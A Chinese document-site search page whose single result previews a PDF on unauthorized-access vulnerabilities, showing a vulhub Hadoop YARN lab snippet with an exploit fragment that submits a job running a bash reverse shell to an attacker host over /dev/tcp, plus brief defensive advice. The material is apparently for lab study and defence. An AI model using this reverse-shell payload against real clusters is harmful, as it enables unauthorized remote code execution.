首页 文库资料 文章资讯  上传文档  发布文章  登录账户

分类

全部数据库(1)Redis(1)

语言

全部中文(简体)(1)

格式

全部PDF文档 PDF(1)
 
本次搜索耗时 0.007 秒,为您找到相关结果约 1 个.

  • pdf文档 常见Redis未授权访问漏洞总结

    com/vulhub/vulhub/master/hadoop/unauthorized- yarn/docker-compose.yml wget https://raw.githubusercontent.com/vulhub/vulhub/master/hadoop/unauthorized- yarn/exploit.py #或者利用DownGit下载 https://github.c com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn DownGit网址:https://minhaskamal.github.io/DownGit/#/home docker-compose build && docker-compose up -d #编译并启动环境 访问 http://192.168.18.129:8088/cluster 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) 反弹成功 防御手段 -如无必要,关闭 Hadoop Web 管理页面。 -开启身份验证,防止未经授权用户访问。
    0 码力 | 44 页 | 19.34 MB | 1 年前
    3
共 1 条
  • 1
前往
相关搜索词
常见Redis授权访问漏洞总结